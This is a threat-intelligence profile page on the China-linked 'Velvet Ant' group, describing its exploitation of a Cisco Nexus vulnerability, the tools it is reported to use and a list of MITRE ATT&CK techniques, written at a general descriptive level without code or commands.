Menu

  • Alerts
  • Incidents
  • News
  • APTs
  • Cyber Decoded
  • Cyber Hygiene
  • Cyber Review
  • Cyber Tips
  • Definitions
  • Malware
  • Threat Actors
  • Tutorials

Useful Tools

  • Password generator
  • Report an incident
  • Report to authorities
No Result
View All Result
CTF Hack Havoc
CyberMaterial
  • Education
    • Cyber Decoded
    • Definitions
  • Information
    • Alerts
    • Incidents
    • News
  • Insights
    • Cyber Hygiene
    • Cyber Review
    • Tips
    • Tutorials
  • Support
    • Contact Us
    • Report an incident
  • About
    • About Us
    • Advertise with us
Get Help
Hall of Hacks
  • Education
    • Cyber Decoded
    • Definitions
  • Information
    • Alerts
    • Incidents
    • News
  • Insights
    • Cyber Hygiene
    • Cyber Review
    • Tips
    • Tutorials
  • Support
    • Contact Us
    • Report an incident
  • About
    • About Us
    • Advertise with us
Get Help
No Result
View All Result
Hall of Hacks
CyberMaterial
No Result
View All Result
Home Matrix Botnet

Velvet Ant group – Threat Actor

January 25, 2025
Reading Time: 5 mins read
in Threat Actors
Velvet Ant group – Threat Actor

Velvet Ant group

Location

China

Date of initial activity

2024

Suspected Attribution 

State-Sponsored Threat Group

Government Affiliation

Yes

Motivation

Espionage

Associated Tools

Cobalt Strike 
Empire 
Mimikatz
RATs (Remote Access Trojans) 
Metasploit 
PowerShell Scripts 
Netcat 
Rclone 

Software

Windows

Overview

In the realm of cyber threats, the group known as Velvet Ant stands out for its sophisticated and highly targeted attacks. Emerging as a formidable force, Velvet Ant is a Chinese state-backed threat actor, recognized for its relentless exploitation of zero-day vulnerabilities and advanced tactics. Their operations are marked by a strategic focus on high-value targets, often involving critical infrastructure and sensitive governmental entities. The group’s activity underscores a broader trend in cyber warfare where nation-state actors leverage advanced persistent threats (APTs) to further geopolitical objectives. Velvet Ant gained notoriety through its exploitation of CVE-2024-20399, a critical vulnerability in Cisco Nexus switches. This vulnerability, which was disclosed in early 2024, provided a gateway for Velvet Ant to infiltrate and compromise network environments with unprecedented efficiency. By leveraging this zero-day vulnerability, the group was able to execute complex attack vectors, gaining unauthorized access to sensitive systems and potentially exfiltrating crucial data. The group’s modus operandi reflects a deep understanding of their targets’ network architectures and operational environments. Velvet Ant’s attacks are characterized by a high degree of stealth and precision, often involving multi-layered tactics that include initial exploitation, lateral movement, and data exfiltration. This approach not only maximizes their impact but also minimizes detection risks, making them a significant concern for cybersecurity professionals and organizations worldwide.

Common targets

Taiwan- Information

Attack vectors

Software Vulnerabilities

How they operate

At the core of Velvet Ant’s operations is their utilization of tools such as Cobalt Strike and Empire, which serve as the backbone of their command and control (C2) infrastructure. Cobalt Strike, a popular penetration testing tool, is repurposed by the group to establish and maintain control over compromised systems. Its features, including beacons for persistent communication and payload delivery, make it a versatile instrument for executing commands and facilitating lateral movement within a network. Similarly, Empire provides a robust framework for post-exploitation activities, allowing Velvet Ant to execute commands, gather information, and maintain access through various C2 channels. Credential theft and exploitation are central to Velvet Ant’s strategy, with tools like Mimikatz playing a crucial role. Mimikatz is employed to extract sensitive credentials from memory, including plaintext passwords and Kerberos tickets. This capability allows Velvet Ant to escalate privileges and navigate through the network with greater ease. Additionally, the group makes use of PowerShell scripts to perform a range of malicious activities. These scripts are designed to exploit PowerShell’s powerful features for tasks such as data collection, payload execution, and lateral movement, further augmenting their ability to control and exfiltrate data from compromised systems. The Velvet Ant group also leverages custom Remote Access Trojans (RATs) and publicly available tools to establish persistent access and maintain control over infected systems. Tools like njRAT or DarkComet provide the group with the ability to remotely administer compromised machines, execute commands, and gather intelligence. For data exfiltration, Velvet Ant utilizes tools such as Rclone, which facilitates the transfer of data to cloud storage services, thereby circumventing traditional data exfiltration defenses. The group’s technical operations reflect a sophisticated understanding of both the tools at their disposal and the vulnerabilities they exploit. By combining advanced malware, credential dumping techniques, and custom scripts, Velvet Ant demonstrates a high level of adaptability and efficiency in their cyber activities. Their ability to operate stealthily and adapt their methods to overcome security measures underscores the ongoing challenge posed by advanced persistent threats in the cyber landscape. As Velvet Ant continues to evolve and refine their tactics, maintaining vigilance and adopting robust security measures remains essential for defending against such sophisticated threats.

MITRE Tactics and Techniques

Initial Access:
T1133 – External Remote Services: Exploitation of external services to gain initial access to a network.
Execution:
T1047 – Windows Management Instrumentation (WMI): Utilization of WMI for executing malicious commands or scripts. T1059.008 – Command and Scripting Interpreter: Network Device CLI: Use of network device command-line interfaces to execute commands. T1569.002 – System Services: Service Execution: Exploitation of system services for executing commands or payloads.
Persistence:
T1037.004 – Boot or Logon Initialization Scripts: RC Scripts: Use of boot or logon initialization scripts to maintain persistence. T1133 – External Remote Services: Reuse of external remote services for ongoing access. T1078.002 – Valid Accounts: Domain Accounts: Use of valid domain accounts for persistence. T1078.003 – Valid Accounts: Local Accounts: Use of valid local accounts for maintaining access.
Privilege Escalation:
T1078.002 – Valid Accounts: Domain Accounts: Exploitation of domain accounts for elevated privileges.
Defense Evasion:
T1574.001 – Hijack Execution Flow: DLL Search Order Hijacking: Manipulation of DLL search order to evade detection. T1562.004 – Impair Defenses: Disable or Modify System Firewall: Alteration of firewall settings to bypass defenses. T1055 – Process Injection: Injection of malicious code into legitimate processes to evade detection. T1070.006 – Indicator Removal: Timestomp: Modification of file timestamps to obscure evidence of malicious activity. T1036.005 – Masquerading: Match Legitimate Name or Location: Masking malicious files or processes as legitimate entities.
Credential Access:
T1003.001 – OS Credential Dumping: LSASS Memory: Extraction of credentials from LSASS memory.
Discovery:
T1087.002 – Account Discovery: Domain Account: Identification of domain accounts within the network. T1083 – File and Directory Discovery: Enumeration of files and directories to gather information. T1135 – Network Share Discovery: Discovery of network shares for accessing additional resources. T1018 – Remote System Discovery: Identification of remote systems within the network. T1082 – System Information Discovery: Collection of system information to aid in further attacks. T1016 – System Network Configuration Discovery: Gathering information on network configuration. T1040 – Network Sniffing: Capturing network traffic to gather data.
Lateral Movement:
T1021.002 – Remote Services: SMB/Windows Admin Shares: Use of SMB/Windows Admin Shares for lateral movement. T1021.004 – Remote Services: SSH: Utilization of SSH for moving laterally within the network. T1570 – Lateral Tool Transfer: Transfer of tools between systems for lateral movement.
Collection:
T1039 – Data from Network Shared Drive: Collection of data from network shared drives.
Command and Control:
T1572 – Protocol Tunneling: Use of tunneling techniques to disguise command and control traffic. T1090.001 – Proxy: Internal Proxy: Use of internal proxies for routing command and control traffic. T1132.001 – Data Encoding: Standard Encoding: Encoding of data to evade detection during exfiltration. T1071.001 – Application Layer Protocol: Web Protocols: Utilization of web protocols for command and control communication.
Exfiltration:
T1048 – Exfiltration Over Alternative Protocol: Use of alternative protocols to exfiltrate data.
References:
  • China-Nexus Threat Group ‘Velvet Ant’ Abuses F5 Load Balancers for Persistence
Tags: ChinaCiscoCobalt StrikeDarkCometEmpireGovernmentNexus switchesNjRATTaiwanThreat ActorsVelvet Ant groupVulnerability
ADVERTISEMENT

Related Posts

Storm-1811 (Cybercriminal) – Threat Actor

Storm-1811 (Cybercriminal) – Threat Actor

March 2, 2025
CopyCop (State-Sponsored) – Threat Actor

CopyCop (State-Sponsored) – Threat Actor

March 2, 2025
Storm-0539 – Threat Actor

Storm-0539 – Threat Actor

March 2, 2025
Void Manticore (Storm-0842) – Threat Actor

Void Manticore (Storm-0842) – Threat Actor

March 2, 2025
Unfading Sea Haze – Threat Actor

Unfading Sea Haze – Threat Actor

March 2, 2025
Ikaruz Red Team – Threat Actor

Ikaruz Red Team – Threat Actor

March 2, 2025

Latest Alerts

Oil-Themed Phishing Spreads Snake Keylogger

Forminator Plugin Flaw Risks 600,000 Sites

Kimsuky Tricks Users Into Self Hacking

Scammers Use Fake Ads to Steal Pi Wallets

Blind Eagle Uses VBS Scripts to Deploy RATs

C4 Bomb Cracks Chrome Cookie Encryption

Subscribe to our newsletter

    Latest Incidents

    Cyberattack on Brazils CM Software Vendor

    Cyberattack Halts Hero España Production

    Hacker Attack on Australian Airline Qantas

    Cyberattack Hits Austrian Hospital Vendor

    Sophisticated Attack Hits War Crimes Court

    Ransomware Hits Swiss Government Vendor

    CyberMaterial Logo
    • About Us
    • Contact Us
    • Jobs
    • Legal and Privacy Policy
    • Site Map

    © 2025 | CyberMaterial | All rights reserved

    Welcome Back!

    Login to your account below

    Forgotten Password?

    Retrieve your password

    Please enter your username or email address to reset your password.

    Log In

    Add New Playlist

    No Result
    View All Result
    • Alerts
    • Incidents
    • News
    • Cyber Decoded
    • Cyber Hygiene
    • Cyber Review
    • Definitions
    • Malware
    • Cyber Tips
    • Tutorials
    • Advanced Persistent Threats
    • Threat Actors
    • Report an incident
    • Password Generator
    • About Us
    • Contact Us
    • Advertise with us

    Copyright © 2025 CyberMaterial